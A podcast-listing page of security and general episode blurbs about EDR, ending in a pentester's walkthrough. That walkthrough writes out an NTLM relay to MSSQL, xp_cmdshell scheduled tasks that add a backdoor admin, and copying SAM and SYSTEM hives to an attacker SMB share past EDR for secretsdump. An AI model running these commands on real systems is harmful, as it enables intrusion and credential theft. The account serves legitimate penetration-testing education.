Editing by Intrasecure inc
Virtual studio by Riverside.fm

Chess After Dark
#268 Björn Bragi & Jóhann Alfreð

Chess After Dark

Play Episode Listen Later Nov 19, 2025 138:22


Our guests tonight are Björn Bragi, comedian and television personality, and Jóhann Alfreð, comedian and lawyer.

Topics in the episode:
News of the week
Vesen & Taskmaster
Púðursykur
Tottenham
Bannað að hlæja
Kviss
Áramótaskaupið
Sober life / on top without alcohol
Golf
Mið Ísland
Knight questions

This episode is brought to you by:
KALDI
WOLT
Íslandssjóðir
Smáríkið
Grillmarkaðurinn
Orka Náttúrunnar
Dineout
Happatreyjur
APRÓ
Sjöstrand
Lengjan
Subway
Dave&Jons
Frumherji
KEMI
Eagle golfferðir

Enjoy, dear listeners.

SBS Sinhala - SBS සිංහල වැඩසටහන
Here is information about the recently changed driver licence rules in Australia

SBS Sinhala - SBS සිංහල වැඩසටහන

Play Episode Listen Later Nov 18, 2025 9:17


Listen to the SBS Sinhala discussion of the notable recent changes to Australia's EDR, or Experienced Driver Recognition, system.

Paul's Security Weekly
Year of the (Clandestine) Linux Desktop, topic, and the news - Rob Allen - ESW #433

Paul's Security Weekly

Play Episode Listen Later Nov 17, 2025 116:49


Segment 1: Interview with Rob Allen

It's the Year of the (Clandestine) Linux Desktop! As if EDR evasions weren't enough, attackers are now employing yet another method to hide their presence on enterprise systems: deploying tiny Linux VMs. Attackers are using Hyper-V and/or WSL to deploy tiny (120MB disk space and 256MB memory) Linux VMs to host a custom reverse shell and reverse proxy. In this segment, we'll discuss strategies and mitigations to battle this novel technique with Rob Allen from ThreatLocker.

Segment Resources:
Pro-Russian Hackers Use Linux VMs to Hide in Windows
Russian Hackers Abuse Hyper-V to Hide Malware in Linux VMs
Qilin ransomware abuses WSL to run Linux encryptors in Windows

This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them!

Segment 2: Topic - Threat Modeling Humanoid Robots

We're entering the age of human-shaped robots, so it seems like a good time to talk about the fact that they ALREADY HAVE CVEs assigned to them. I guess this isn't a terrible thing - John Connor might have had an easier time if he could simply hack the terminators from a distance...

Resources:
https://www.unitree.com/H2 (watch the video!)
China's humanoid robots get factory jobs as UBTech's model scores US$112 million in orders
The big reveal: Xpeng founder unzips humanoid robot to prove it's not human
Exploit Allows for Takeover of Fleets of Unitree Robots - Security researchers find a wormable vulnerability
100-page Paper: The Cybersecurity of a Humanoid Robot
5-page Paper: Cybersecurity AI: Humanoid Robots as Attack Vectors
Amazingly, $300 smart vacuums have some of the same exact vulnerabilities and backdoors built into them as the $16,000 humanoid robots! The Day My Smart Vacuum Turned Against Me

Segment 3: Weekly News

Finally, in the enterprise security news,
A $435M venture round
A $75M seed round
a few acquisitions
the producer of the movie Half Baked bought a spyware company
AI isn't going well, or is it? maybe we just need to adopt it more slowly and deliberately?
ad-blockers are enterprise best practices
firewalls and VPNs are security risks, according to insurance claims
could you power an entire house with disposable vapes?

All that and more, on this episode of Enterprise Security Weekly. Visit https://www.securityweekly.com/esw for all the latest episodes! Show Notes: https://securityweekly.com/esw-433

Enterprise Security Weekly (Audio)
Year of the (Clandestine) Linux Desktop, topic, and the news - Rob Allen - ESW #433

Enterprise Security Weekly (Audio)

Play Episode Listen Later Nov 17, 2025 116:49



Paul's Security Weekly TV
Year of the (Clandestine) Linux Desktop, topic, and the news - Rob Allen - ESW #433

Paul's Security Weekly TV

Play Episode Listen Later Nov 17, 2025 116:50



Enterprise Security Weekly (Video)
Year of the (Clandestine) Linux Desktop, topic, and the news - Rob Allen - ESW #433

Enterprise Security Weekly (Video)

Play Episode Listen Later Nov 17, 2025 116:50



The John Batchelor Show
58: EDr. AJ Kolhari discusses Russia's successful test of the nuclear-powered Burevestnik cruise missile, which flew 14,000 km for 15 hours. The missile captures and compresses air, heating it over a nuclear reactor to create thrust. Kulhari emphasizes t

The John Batchelor Show

Play Episode Listen Later Nov 7, 2025 10:27


EDr. AJ Kolhari discusses Russia's successful test of the nuclear-powered Burevestnik cruise missile, which flew 14,000 km for 15 hours. The missile captures and compresses air, heating it over a nuclear reactor to create thrust. Kulhari emphasizes the danger because it flies low (50 to 100 m) and is hard to detect. He notes this nuclear propulsion technology, or similar ramjet designs, could revolutionize commercial travel and be applied to flight on Mars, using its CO₂ atmosphere for heating. 1958

Cyber Security Headlines
Hackers use Hyper-V, Cisco UCCX flaw, The Louvre's password

Cyber Security Headlines

Play Episode Listen Later Nov 7, 2025 7:58


Hackers use Windows Hyper-V to evade EDR detection
Critical Cisco UCCX flaw lets attackers run commands as root
The Louvre's video security password was reportedly Louvre

Huge thanks to our sponsor, ThreatLocker

Imagine having the power to decide exactly what runs in your IT environment, and blocking everything else by default. That's what ThreatLocker delivers. As a zero-trust endpoint protection platform, ThreatLocker fills the gaps traditional solutions leave behind, giving your business stronger security and control. Don't just react to threats; stop them with ThreatLocker.

Find the stories behind the headlines at CISOseries.com.

CISSP Cyber Training Podcast - CISSP Training Program
CCT 294: Config Management Essentials - CISSP Domain 7

CISSP Cyber Training Podcast - CISSP Training Program

Play Episode Listen Later Nov 3, 2025 32:10 Transcription Available


A single Windows shortcut can open the door to espionage, and that's exactly where we begin. We break down a fresh LNK exploit campaign to show how hidden command execution and DLL sideloading slip past busy teams, then pivot into the core defense most organizations underuse: disciplined configuration management. From baselines and version control to change boards and rapid rollback, we map the habits and tools that turn chaos into control.

We walk through building secure, realistic baselines with CIS Benchmarks and NIST 800-128, and why "simple and enforceable" beats "perfect and ignored." You'll hear how least privilege for change stops shadow tweaks, how EDR and application firewalls catch command and control, and how automation with Ansible, SCCM, and Terraform keeps fleets consistent. We spotlight the CMDB as a living source of truth, only valuable if you maintain ownership, automate updates, and report on drift so leadership and risk teams can act.

Change governance becomes your stabilizer. A change control board aligns IT, security, operations, risk, and compliance before big moves, while an emergency change advisory board authorizes fast action for zero-days and incidents with a strict post-implementation review. We break down the full change lifecycle (request, impact analysis, staging, implementation, verification, CMDB updates) and the common pitfalls to avoid, including undocumented changes, brittle rollbacks, and ignoring post-change scan results. Expect practical guidance on when to auto-patch Windows, how to iterate quarterly without overengineering, and what metrics prove progress.

If you're aiming to master CISSP Domain 7 or just want fewer outages and faster recovery, this conversation gives you a clear blueprint to reduce attack surface and increase stability. If it helps, share it with a teammate, subscribe for more deep dives, and leave a quick review so we can keep improving for you.

Gain exclusive access to 360 FREE CISSP Practice Questions at FreeCISSPQuestions.com and have them delivered directly to your inbox! Don't miss this valuable opportunity to strengthen your CISSP exam preparation and boost your chances of certification success. Join now and start your journey toward CISSP mastery today!

The Cybersecurity Defenders Podcast
#262 - Defender Fridays: What does "AI-ready SOC" actually mean? With Dr. Anton Chuvakin from CISO, Google Cloud

The Cybersecurity Defenders Podcast

Play Episode Listen Later Oct 31, 2025 35:13


Dr. Anton Chuvakin, Security Advisor at Office of the CISO, Google Cloud and a recognized expert in SIEM, log management, and PCI DSS compliance, will help us cut through the buzzwords and discuss modern security operations.

Join the Defender Fridays community, live every Friday, to discuss the dynamic world of information security in a collaborative space with seasoned professionals.

Dr. Chuvakin is now involved with security solution strategy at Google Cloud, where he arrived via Chronicle Security (an Alphabet company) acquisition in July 2019. He is also a co-host of Cloud Security Podcast.

Until June 2019, Dr. Anton Chuvakin was a Research VP and Distinguished Analyst at Gartner for Technical Professionals (GTP) Security and Risk Management Strategies (SRMS) team. At Gartner he covered a broad range of security operations and detection and response topics, and is credited with inventing the term "EDR." He is a recognized security expert in the field of SIEM, log management and PCI DSS compliance. He is an author of books "Security Warrior", "PCI Compliance", "Logging and Log Management" and a contributor to "Know Your Enemy II", "Information Security Management Handbook" and others. Anton has published dozens of papers on log management, SIEM, correlation, security data analysis, PCI DSS, honeypots, etc. His blog securitywarrior.org was one of the most popular in the industry.

Support our show by sharing your favorite episodes with a friend, subscribe, give us a rating or leave a comment on your podcast platform. This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform, infrastructure for SecOps where everything is built API first. Scale with confidence as your business grows. Start today for free at limacharlie.io.

BlueTech Research Podcast Channel
The quiet revolution in electrodialysis and lithium recovery

BlueTech Research Podcast Channel

Play Episode Listen Later Oct 30, 2025 17:15


Electrodialysis is making a comeback. Once niche, ED and EDR are being reinvented with smarter membranes, modular stack designs, and solar-powered operation. BlueTech Analyst Dr. Vishal Wagholikar joins Rhys and Divya to explore how these innovations could enable off-grid desalination, resource recovery, and low-cost acid and base generation.

The conversation then shifts to policy, with the proposed Advancing Water Reuse Act offering a 30% U.S. tax credit that could transform industrial reuse economics, boosting uptake among data centers, semiconductor plants, and utilities.

They close on lithium, spotlighting the UK's first commercial DLE project and a Veolia patent targeting zero-liquid discharge and circular lithium recovery. Together, these stories reveal where technology, regulation, and resource security now intersect in water innovation.

Join us for the upcoming web briefings in November:
20 November: Transforming Nitrogen Management: From Cost to Opportunity
27th November: Ceramic Membranes: Market & Technology Update 2025

Presented by BlueTech Research®, Actionable Water Technology Market Intelligence. Watch the trailer of Our Blue World: A Water Odyssey. Get involved, and learn more on the website: braveblue.world

Podcasty Aktuality.sk
SHARE: Slovak companies and cybersecurity: This is where they make their biggest mistake

Podcasty Aktuality.sk

Play Episode Listen Later Oct 29, 2025 43:34


Cybersecurity has long since stopped being just about antivirus and passwords. Although companies in Slovakia have improved their basic hygiene, many still underestimate more sophisticated threats. They often invest in advanced technologies but lack qualified people who can correctly evaluate and manage them. Why is it important to separate IT from security, and what options are there for companies that cannot afford their own security team? In the new episode of the SHARE podcast, host Maroš Žofčin talks with Július Selecký, Solution Architect at Eset, about the real state of cybersecurity in Slovak companies, the most common mistakes, and solutions such as managed detection and response (MDR). The podcast is brought to you in cooperation with Eset. Prepare for the future with the book by the editors of Živé.sk, „Umelá inteligencia: Pripravte sa na budúcnosť“ (Artificial Intelligence: Prepare for the Future). Now also available as an ebook! TIP: https://zive.aktuality.sk/clanok/0RfdZVW/nahliadnite-do-buducnosti-vydavame-knihu-o-umelej-inteligencii/
In the podcast we also cover these topics: • Where Slovak companies have improved (passwords, updates) and what they still underestimate. • Why the IT department and the security department should be strictly separated. • Risk analysis: how companies should identify what is key to their business. • What EDR and XDR systems are and why ordinary antivirus is no longer enough. • What options exist for companies that do not have their own security experts (MDR).
We also cover the topic in the article: https://zive.aktuality.sk/clanok/nmdWnCW/firmy-maju-antivirusy-no-chyba-im-tato-klucova-vec-mnohe-na-to-doplatili/ The SHARE podcast is produced by the magazine Živé.sk.

Backup Central's Restore it All
Detect Ransomware Before It Destroys Your Business

Backup Central's Restore it All

Play Episode Listen Later Oct 27, 2025 33:56 Transcription Available


Ransomware detection is more complex than most organizations realize. In this episode, cybersecurity expert Mike Saylor breaks down the real-world signs of ransomware attacks—from users complaining about slow computers to smart devices acting strangely. We explore polymorphic malware that changes based on its target, the risks posed by managed service providers using shared credentials, and why milliseconds matter in ransomware detection and response. Mike explains the difference between EDR, XDR, SIEM, and SOAR tools, helping you understand which security solutions you actually need. We also discuss why 24/7 monitoring is non-negotiable and how even small businesses can afford proper ransomware detection capabilities. If you're trying to protect your organization without breaking the bank, this episode offers practical guidance on building your security stack and knowing when to call in expert help.

CISSP Cyber Training Podcast - CISSP Training Program
CCT 291: CISSP Rapid Review Exam Prep (Domain 7) - Part #2

CISSP Cyber Training Podcast - CISSP Training Program

Play Episode Listen Later Oct 23, 2025 43:48 Transcription Available


You can harden your network and still miss the front door: aging edge devices with elevated access, thin logging, and long‑ignored firmware. We dig into the uncomfortable truth behind “set it and forget it” firewalls, VPNs, and gateways, then lay out a practical Domain 7 playbook that helps you detect faster, respond cleaner, and recover without chaos. We start with the incident management sequence that actually works under pressure—detection, response, mitigation, reporting, recovery, remediation, and lessons learned—showing how legal timelines, stakeholder updates, and RTO/RPO planning fit together. From there, we map the controls that pull their weight: next‑gen firewalls and WAFs, IDS/IPS, smart whitelisting and blacklisting, sandboxing that anticipates time‑bomb malware, and when to lean on EDR, MDR, and UEBA to cut through alert fatigue. Then we get hands‑on with vulnerability and patch management, focusing on asset inventory, critical‑first prioritization, scanning automation, and staged deployments with real rollback plans. We connect the dots to change management so fixes don't become outages. Resilience gets its due: backup integrity and rotation, hot/warm/cold recovery sites, multi‑region processing, HA pairs, QoS to preserve critical traffic, and fault‑tolerant design that keeps services running when parts fail. Finally, we round out security operations with disaster recovery drills—from tabletop to full cutover—plus business continuity planning that aligns cyber recovery with revenue‑critical processes. Physical security and personal safety close the loop: layered access, surveillance, environmental controls, and travel and duress protocols that protect your people as well as your data. If you're preparing for the CISSP or sharpening a real program, you'll leave with concrete steps to reduce risk now and a roadmap to mature over time. Enjoyed this deep dive? Subscribe, share with a teammate who owns Domain 7, and leave a quick review to help others find the show. Your feedback shapes future topics and tools we build for you. Gain exclusive access to 360 FREE CISSP Practice Questions at FreeCISSPQuestions.com and have them delivered directly to your inbox! Don't miss this valuable opportunity to strengthen your CISSP exam preparation and boost your chances of certification success. Join now and start your journey toward CISSP mastery today!

The Cybersecurity Readiness Podcast Series
Episode 93 -- The New Browser Wars: Why the Enterprise Browser Has Become Cybersecurity's Next Battleground

The Cybersecurity Readiness Podcast Series

Play Episode Listen Later Oct 19, 2025 34:03


In this episode, Dr. Dave Chatterjee speaks with Anupam Upadhyay, Senior Vice President, Product Management, Palo Alto Networks, a seasoned product and cybersecurity leader, to unpack the “new browser wars” and why enterprise browsers are fast becoming a core battleground in the fight for digital trust. Drawing on over two decades of experience spanning Cisco, startups, and Palo Alto, Upadhyay traces the evolution of the humble browser from a passive content viewer into the primary interface for cloud applications, collaboration tools, and sensitive business data. The conversation examines the browser's expanding role as both a productivity hub and a primary attack vector—accounting for over 90 percent of initial intrusions via phishing, malicious extensions, or session hijacking. Through the lens of the Commitment-Preparedness-Discipline (CPD) Framework, Dr. Chatterjee and Anupam Upadhyay emphasize that securing the enterprise browser is not merely a technical exercise but a governance imperative: leadership commitment to zero-trust principles, preparedness through hardened configurations and employee training, and disciplined enforcement of consistent controls across devices and partners.
Time Stamps
• 00:49 — Dave's introduction and guest overview.
• 03:00 — Anupam Upadhyay's career journey and reinvention at Palo Alto Networks.
• 05:00 — Historical context: how browsers stayed outside the security spotlight.
• 08:40 — Cloud and SaaS migration shifting business to the browser.
• 11:20 — Emerging browser threats and data sanctity concerns.
• 14:30 — Malicious extensions and the limits of traditional EDR.
• 16:07 — Browser security as part of Zero Trust architecture.
• 18:30 — Balancing security and user experience.
• 22:10 — Operating in hostile environments and credential revocation.
• 25:00 — Dr. Chatterjee introduces the CPD framework for governance.
• 28:45 — Implementation and user adoption challenges.
• 30:00 — Continuous testing and discipline in browser security.
• 33:05 — Closing takeaways on Zero Trust mindset and defense-in-depth.
Podcast summary with discussion highlights - https://www.dchatte.com/episode-93-the-new-browser-wars-why-the-enterprise-browser-has-become-cybersecuritys-next-battleground/
Connect with Host Dr. Dave Chatterjee
LinkedIn: https://www.linkedin.com/in/dchatte/
Website: https://dchatte.com/
Books Published
The DeepFake Conspiracy
Cybersecurity Readiness: A Holistic and High-Performance Approach
Articles Published
Ramasastry, C. and Chatterjee, D. (2025). Trusona: Recruiting For The Hacker Mindset, Ivey Publishing, Oct 3, 2025.
Chatterjee, D. and Leslie, A. (2024). “Ignorance is not bliss: A...

Security Conversations
JAGS LABScon 2025 keynote: Steps to an ecology of cyber

Security Conversations

Play Episode Listen Later Oct 18, 2025 31:00


Three Buddy Problem (Episode 68): The buddies are trapped in timezone hell with cross-country travel this week. In this special episode, we present Juan Andres Guerrero-Saade's LABScon 2025 keynote-day presentation on the state of cybersecurity and why this phase of our collective project has failed, and how to build something smarter, more sustainable, and deeply interconnected in its place. Juanito traces the field's evolution from chaos to consolidation, weaving in cybernetics, standardization, and the dawning coexistence of human and artificial evaluative power. The result is part philosophical sermon, part rallying cry, an invitation to reject the industry's slave morality, rethink our tools, and steer the next era of defense with intention.

Queen City Improvement Bureau
Oct 16 2025 - With Apologies For Paul's Fragged Voice

Queen City Improvement Bureau

Play Episode Listen Later Oct 17, 2025


On this week's meeting agenda: • Aidan escaped the sub-basement and caught a showing of The Master Plan at the newly renovated Globe Theatre. • Admin has been talking for months about how they changed the city's Design Standards so that new residential roads will be wider. How did that happen? When did that happen? Why did that happen? We have the backstory on that. • Really good news from the Housing Accelerator front! Yay! • Economic Development Regina presented their 2026 budget to city council. It did not go well. • The Regina Public Library also presented their 2026 budget to city council. It didn't go great either but at least it went better than EDR's. • The Queen City Improvement Bureau's Halloween-adjacent 10th Anniversary LIVE Show is coming up October 29, 7pm at the Artesian on 13th! • The mayor made a big funding announcement for downtown. Note: Apologies for how Paul's voice sounds like a gravel quarry that's smoked a pack of cigarettes a day for 35 years. The doctors say there's nothing modern medicine can do to speed up his vocal recovery and the satanic rituals have not helped.

Paul's Security Weekly
AI, EDR, and Hacking Things - PSW #896

Paul's Security Weekly

Play Episode Listen Later Oct 16, 2025 124:54


First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: • Your vulnerability scanner is your weakest link • Scams that almost got me • The state of EDR is not good • You don't need to do that on a phone or Raspberry Pi • Hash cracking and exploits • Revisiting LG WebOS • Hardening Docker images • Hacking Moxa NPort • Shoddy academic research • The original sin of computing • Bodycam hacking • A new OS for ESP32 • The AI bubble is going to burst • Mobile VPNs are not always secure. Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-896

Paul's Security Weekly TV
AI, EDR, and Hacking Things - PSW #896

Paul's Security Weekly TV

Play Episode Listen Later Oct 16, 2025 124:54


First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: • Your vulnerability scanner is your weakest link • Scams that almost got me • The state of EDR is not good • You don't need to do that on a phone or Raspberry Pi • Hash cracking and exploits • Revisiting LG WebOS • Hardening Docker images • Hacking Moxa NPort • Shoddy academic research • The original sin of computing • Bodycam hacking • A new OS for ESP32 • The AI bubble is going to burst • Mobile VPNs are not always secure. Show Notes: https://securityweekly.com/psw-896

Paul's Security Weekly (Podcast-Only)
AI, EDR, and Hacking Things - PSW #896

Paul's Security Weekly (Podcast-Only)

Play Episode Listen Later Oct 16, 2025 124:54


First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: • Your vulnerability scanner is your weakest link • Scams that almost got me • The state of EDR is not good • You don't need to do that on a phone or Raspberry Pi • Hash cracking and exploits • Revisiting LG WebOS • Hardening Docker images • Hacking Moxa NPort • Shoddy academic research • The original sin of computing • Bodycam hacking • A new OS for ESP32 • The AI bubble is going to burst • Mobile VPNs are not always secure. Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-896

Paul's Security Weekly (Video-Only)
AI, EDR, and Hacking Things - PSW #896

Paul's Security Weekly (Video-Only)

Play Episode Listen Later Oct 16, 2025 124:54


First up is a technical segment on UEFI shells: determining if they contain dangerous functionality that allows attackers to bypass Secure Boot. Then in the security news: • Your vulnerability scanner is your weakest link • Scams that almost got me • The state of EDR is not good • You don't need to do that on a phone or Raspberry Pi • Hash cracking and exploits • Revisiting LG WebOS • Hardening Docker images • Hacking Moxa NPort • Shoddy academic research • The original sin of computing • Bodycam hacking • A new OS for ESP32 • The AI bubble is going to burst • Mobile VPNs are not always secure. Show Notes: https://securityweekly.com/psw-896

The Cybersecurity Defenders Podcast
#256 - Intel Chat: RediShell, Cisco zero-day vulnerability, AI voice cloning tech, Brickstorm & pro-Russia teen hackers arrested

The Cybersecurity Defenders Podcast

Play Episode Listen Later Oct 13, 2025 46:23


In this episode of The Cybersecurity Defenders Podcast, we discuss some intel being shared in the LimaCharlie community.
A newly disclosed vulnerability in Redis, dubbed RediShell and tracked as CVE-2025-49844, affects all Redis versions and carries a maximum CVSS score of 10.0.
Cisco has disclosed a critical zero-day vulnerability—CVE-2025-20352—affecting its widely deployed IOS and IOS XE software, confirming active exploitation in the wild.
Researchers at NCC Group have found that voice cloning technology has reached a level where just five minutes of recorded audio is enough to generate convincing voice clones in real time.
A China-linked cyber-espionage group, tracked as UNC5221, has been systematically targeting network infrastructure appliances that lack standard endpoint detection and response (EDR) support.
Dutch authorities have arrested two 17-year-old boys suspected of being recruited by pro-Russian hackers to carry out surveillance activities.
Support our show by sharing your favorite episodes with a friend, subscribe, give us a rating or leave a comment on your podcast platform. This podcast is brought to you by LimaCharlie, maker of the SecOps Cloud Platform, infrastructure for SecOps where everything is built API first. Scale with confidence as your business grows. Start today for free at limacharlie.io.

Paul's Security Weekly
IoT Hacks Galore - Kieran Human - PSW #895

Paul's Security Weekly

Play Episode Listen Later Oct 9, 2025 129:14


This week we kick things off with a special interview: Kieran Human from ThreatLocker talks about EDR bypasses and other special projects. In the security news: • Hacking TVs • Flushable wipes are not the only problem • People just want to spy on their pets, except the devices can be hacked • Linux EDR is for the birds • What does my hat say we love exploits and hashes • ESP32s in your router • RF signal generator on a Pi Zero • Mic-E-Mouse and other things that will probably never happen, until they do • Hacking with money • Uninitialized variables and other things the compiler should catch • Breaking out of the shell • Hacking with sound, for real, not just another side channel attack • Bring back 2G • When the game engine gets hacked • Oracle 0-days. This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-895

Paul's Security Weekly TV
IoT Hacks Galore - Kieran Human - PSW #895

Paul's Security Weekly TV

Play Episode Listen Later Oct 9, 2025 129:14


This week we kick things off with a special interview: Kieran Human from ThreatLocker talks about EDR bypasses and other special projects. In the security news: • Hacking TVs • Flushable wipes are not the only problem • People just want to spy on their pets, except the devices can be hacked • Linux EDR is for the birds • What does my hat say we love exploits and hashes • ESP32s in your router • RF signal generator on a Pi Zero • Mic-E-Mouse and other things that will probably never happen, until they do • Hacking with money • Uninitialized variables and other things the compiler should catch • Breaking out of the shell • Hacking with sound, for real, not just another side channel attack • Bring back 2G • When the game engine gets hacked • Oracle 0-days. This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Show Notes: https://securityweekly.com/psw-895

Paul's Security Weekly (Podcast-Only)
IoT Hacks Galore - Kieran Human - PSW #895

Paul's Security Weekly (Podcast-Only)

Play Episode Listen Later Oct 9, 2025 129:14


This week we kick things off with a special interview: Kieran Human from ThreatLocker talks about EDR bypasses and other special projects. In the security news: • Hacking TVs • Flushable wipes are not the only problem • People just want to spy on their pets, except the devices can be hacked • Linux EDR is for the birds • What does my hat say we love exploits and hashes • ESP32s in your router • RF signal generator on a Pi Zero • Mic-E-Mouse and other things that will probably never happen, until they do • Hacking with money • Uninitialized variables and other things the compiler should catch • Breaking out of the shell • Hacking with sound, for real, not just another side channel attack • Bring back 2G • When the game engine gets hacked • Oracle 0-days. This segment is sponsored by ThreatLocker. Visit https://securityweekly.com/threatlocker to learn more about them! Visit https://www.securityweekly.com/psw for all the latest episodes! Show Notes: https://securityweekly.com/psw-895

Cyber Crime Junkies
BIG LIES in Cybersecurity--Why We Need to Rebuild the Industry

Cyber Crime Junkies

Play Episode Listen Later Oct 4, 2025 52:53 Transcription Available


In the world of cybersecurity, there are big lies that have been perpetuated about compliance, fixability and communication--and it's time to burn it all down and start over. Many experts see one main cybersecurity truth, especially about AI, SIEM, EDR and related business technology. By examining the intersection of AI, cybersecurity, and compliance, we can gain a deeper understanding of the lies that have been told about the state of cybersecurity and work towards a more secure future. Tune in to this thought-provoking
Growth without Interruption. Get peace of mind. Stay Competitive-Get NetGain. Contact NetGain today at 844-777-6278 or reach out online at www.NETGAINIT.com

Security Conversations
Cisco firewall zero-days and bootkits in the wild

Security Conversations

Play Episode Listen Later Sep 27, 2025 114:49


Three Buddy Problem - Episode 65: We zero in on one of the biggest security stories of the year: the discovery of a persistent multi-stage bootkit implanting malware on Cisco ASA firewalls. Details on a new campaign, tied to the same threat actors behind ArcaneDoor, exploiting zero-days in Cisco's 5500-X series appliances, devices that sit at the heart of government and enterprise networks worldwide. Plus, Cisco's controversial handling of these disclosures, CISA's emergency deadlines for patching, the absence of IOCs and samples, and China's long-term positioning. Plus, thoughts on the Secret Service SIM farm discovery in New York and evidence of Russian APTs Turla and Gamaredon collaborating to hit Ukraine targets. Cast: Juan Andres Guerrero-Saade (https://twitter.com/juanandres_gs), Ryan Naraine (https://twitter.com/ryanaraine) and Costin Raiu (https://twitter.com/craiu).

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
SANS Stormcast Monday, September 22nd, 2025: Odd HTTP Request; GoAnywhere MFT Bug; EDR Freeze

SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast

Play Episode Listen Later Sep 22, 2025 9:02


Help Wanted: What are these odd requests about?
An odd request is hitting a number of our honeypots with a somewhat unusual HTTP request header. Please let me know if you know what the request is about.
https://isc.sans.edu/forums/diary/Help+Wanted+What+are+these+odd+reuqests+about/32302/
Fortra GoAnywhere MFT Vulnerability
Fortra's GoAnywhere MFT product suffers from a critical deserialization vulnerability. Fortra released an advisory disclosing the vulnerability on Thursday.
https://www.fortra.com/security/advisories/product-security/fi-2025-012
EDR Freeze
A new tool, EDR Freeze, allows regular users to suspend EDR processes.
https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html

Downtime - The Mountain Bike Podcast
Enduro Showdown: Morillon Finale & Aletsch World Champs

Downtime - The Mountain Bike Podcast

Play Episode Listen Later Sep 16, 2025 67:23


Alright, it's time to catch up on the final round of the Enduro World Cup in Morillon and Enduro World Champs in Aletsch Arena with Morgane Charre and Greg Callaghan. Morillon was a brand new venue which the riders said featured some of the best trails they've ever raced. With the titles already decided, it was all in for those chasing the remaining overall podium places and those looking for their first taste of EDR success. Aletsch delivered a challenging sting in the season's tail to see who would take home those sought after World Champs stripes. So sit back, hit play, and enjoy this episode with Morgane Charre and Greg Callaghan. You can also watch this episode on YouTube here.
Podcast Stuff
Listener Offers
Downtime listeners can now get 10% off of Stashed Space Rails. Stashed is the ultimate way to sort your bike storage. Their clever design means you can get way more bikes into the same space and easily access whichever one you want to ride that day. If you have 2 or more bikes in your garage, they are definitely worth checking out. Just head to stashedproducts.com/downtime and use the code DOWNTIME at the checkout for 10% off your entire order. And just so you know, we get 10% of the sale too, so it's a win win.
Patreon
I would love it if you were able to support the podcast via a regular Patreon donation. Donations start from as little as £3 per month. That's less than £1 per episode and less than the price of a take away coffee. Every little counts and these donations will really help me keep the podcast going and hopefully take it to the next level. To help out, head here.
Merch
If you want to support the podcast and represent, then my webstore is the place to head. All products are 100% organic, shipped without plastics, and made with a supply chain that's using renewable energy. We now also have local manufacture for most products in the US as well as the UK. So check it out now over at downtimepodcast.com/shop.
Newsletter
If you want a bit more Downtime in your life, then you can join my newsletter where I'll provide you with a bit of behind the scenes info on the podcast, interesting bits and pieces from around the mountain bike world, some mini-reviews of products that I've been using and like, partner offers and more. You can do that over at downtimepodcast.com/newsletter.
Follow Us
Give us a follow on Instagram @downtimepodcast or Facebook @downtimepodcast to keep up to date and chat in the comments. For everything video, including riding videos, bike checks and more, subscribe over at youtube.com/downtimemountainbikepodcast. Are you enjoying the podcast? If so, then don't forget to follow it. Episodes will get delivered to your device as soon as it's available and it's totally free. You'll find all the links you need at downtimepodcast.com/follow. You can find us on Apple Podcast, Spotify, Google and most of the podcast apps out there. Our back catalogue of amazing episodes is available at downtimepodcast.com/episodes
Photo - Sven Martin

Risky Business
Risky Biz Soap Box: runZero shakes up vulnerability management

Risky Business

Play Episode Listen Later Sep 15, 2025 34:17


In this sponsored Soap Box edition of the Risky Business podcast, industry legend HD Moore joins the show to talk about runZero's major push into vulnerability management. With its new Nuclei integration, runZero is now able to get a very accurate picture of what's vulnerable in your environment, without spraying highly privileged credentials at attackers on your network. It can also integrate with your EDR platform, and other data sources, to give you powerful visibility into the true state of things on your network and in your cloud. This episode is also available on YouTube.

7 Minute Security
7MS #692: Tales of Pentest Pwnage – Part 76

7 Minute Security

Play Episode Listen Later Sep 12, 2025 32:45


Happy Friday! Today's another hot pile of pentest pwnage. To make it easy on myself I'm going to share the whole narrative that I wrote up for someone else: I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/. I relayed the DA account to a SQL box that BloodHound said had a “session” from another DA. One part I can't explain is the first relay got me a shell in the context of NT SERVICE\MSSQLSERVER. That shell broke for some reason while I was sleeping that night, and the next relay landed as NT AUTHORITY\SYSTEM (!). The net command would let me add a new user, but BLOCK me trying to make that new user a local admin. However, a scheduled task did the trick: xp_cmdshell schtasks /create /tn "Maintenance" /tr "net local group administrators backdoor /add" /sc once /st 12:00 /ru SYSTEM /f and then xp_cmdshell schtasks /run /tn "Maintenance". Turns out a DA wasn't interactively logged in, but a DA account was configured to run a specific service. I learned those goodies are stored in LSA, so the next move was to use my local admin account to RDP in to the victim and create a shadow copy. That part went fine, but for the life of me I couldn't copy reg hives out of it – EDR was unhappy. In the end, the bizarre combo of things that did the trick was: Set up smbserver.py with username/password auth on my attacking box: smbserver.py -smb2support share . -username toteslegit -password 'DontMindMeLOL!' From the victim system, I did an mklink to the shadow copy: mklink /d C:tempbackup ?GLOBALROOTDeviceHarddiskVolumeShadowCopy123 From command prompt on the victim system, I authenticated to my rogue share: net use ATTACKER_IPshare /user:toteslegit DontMindMeLOL! 
Then I did a copy command for the first hive: copy SYSTEM my.attackingipsys.test. EDR would kill this cmd.exe box IMMEDIATELY. However….the copy completed! I repeated this process to get SAM copied over as sam.test. Again, EDR nuked the cmd.exe window but copy completed!!!111!!!!! Finishing move: secretsdump -sam sam.test -system sys.test LOCAL

